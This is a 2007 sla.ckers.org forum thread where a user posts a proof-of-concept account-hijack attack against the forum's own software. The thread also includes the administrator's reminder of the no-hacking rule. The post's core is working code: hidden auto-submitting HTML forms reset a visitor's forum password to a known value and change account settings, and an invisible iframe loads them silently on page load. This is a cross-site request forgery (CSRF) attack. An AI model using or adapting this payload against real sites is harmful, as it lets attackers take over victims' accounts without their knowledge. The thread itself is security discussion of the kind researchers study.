Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Bug reports, feature enhancements or other complaints with the site, with us or just tell us what a miserable existance you have. No death threats or poetry please. Just kidding, no poetry please. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Account Hijack
Posted by: eyeced
Date: January 06, 2007 09:47AM

I know this has been mentioned before with the password changing without the need for the old one, i thought (whilst bored) i'd fire up ethereal and have a look at some of the other things that we could change without the need for user validation. There are quite alot of privacy options and i continued to play around with settings for a while till i came up with this.

First html file
----------------------------------------------------------------------------------

<form name="password" method='post' action='http://sla.ckers.org/forum/control.php'>
<input input="text" value="password" name="panel" style="width:0%" /><br />
<input input="text" value="0" name="forum_id" style="width:0%" /><br />
<input input="text" value="newpass" name="password" style="width:0%" /><br />
<input input="text" value="newpass" name="password2" style="width:0%" /><br />
<input type='submit' value='submit' /></form>
<form name="others" method='post' action='http://sla.ckers.org/forum/control.php'>
<input input="text" value="forum" name="panel" style="width:0%" /><br />
<input input="text" value="0" name="forum_id" style="width:0%" /><br />
<input input="text" value="0" name="tz_offset" style="width:0%" /><br />
<input input="text" value="english" name="user_language" style="width:0%" /><br />
<input input="text" value="0" name="threaded_list" style="width:0%" /><br />
<input input="text" value="0" name="threaded_read" style="width:0%" /><br />
<input input="text" value="1" name="email_notify" style="width:0%" /><br />
<input input="text" value="1" name="show_signature" style="width:0%" /><br />
<input input="text" value="1" name="pm_email_notify" style="width:0%" /><br />
<input type='submit' value='submit' /><br />
</form>
<script>
document.password.submit()
document.others.submit()
</script>

----------------------------------------------------------------------------------

Second html file

----------------------------------------------------------------------------------
<body onload="x=document.createElement('iframe');x.src='newpass.html';y=x.style;
y.width='0px';y.left='0';y.height='0px';document.body.appendChild(x);">
----------------------------------------------------------------------------------

Basically you could just host the code of the second html file on your existing web page and without any user interaction/notification there password for this website would be changed, as well as other settings (cleverly named others).

I know this has been brought to light before i just thought i'd explore different ways of exploiting it without user interaction, and getting an effective way of exploiting the fact that it was POST.

I thought i'd put it in here rather than CSRF, but it could easily suit both.

Options: ReplyQuote
Re: Account Hijack
Posted by: rsnake
Date: January 09, 2007 10:22AM

Yup, this software sucks. I don't have a lot of time to fix it though. But please remember the very first rule of the forum: http://sla.ckers.org/forum/read.php?1,5

"1) Don't spam/hack the spammers/hackers. Anything that breaks the site, or otherwise annoys me in any way will get you banned or worse depending on my mood. Don't test my patience."

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: Account Hijack
Posted by: eyeced
Date: January 09, 2007 11:27AM

Maybe myspace could incorporate that rule to thwart hackers aswell then, yeah i wasnt trying to 'hack' anyone, i was just showing a PoC of an idea. With some fairly new ideas exploits are getting more inventive every day i was just poking about thats all see what i could do on this site. The imagination wondered...

Options: ReplyQuote
Re: Account Hijack
Posted by: rsnake
Date: January 09, 2007 11:46AM

It was more of a friendly reminder. I know you weren't doing anything malicious.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote


Sorry, only registered users may post in this forum.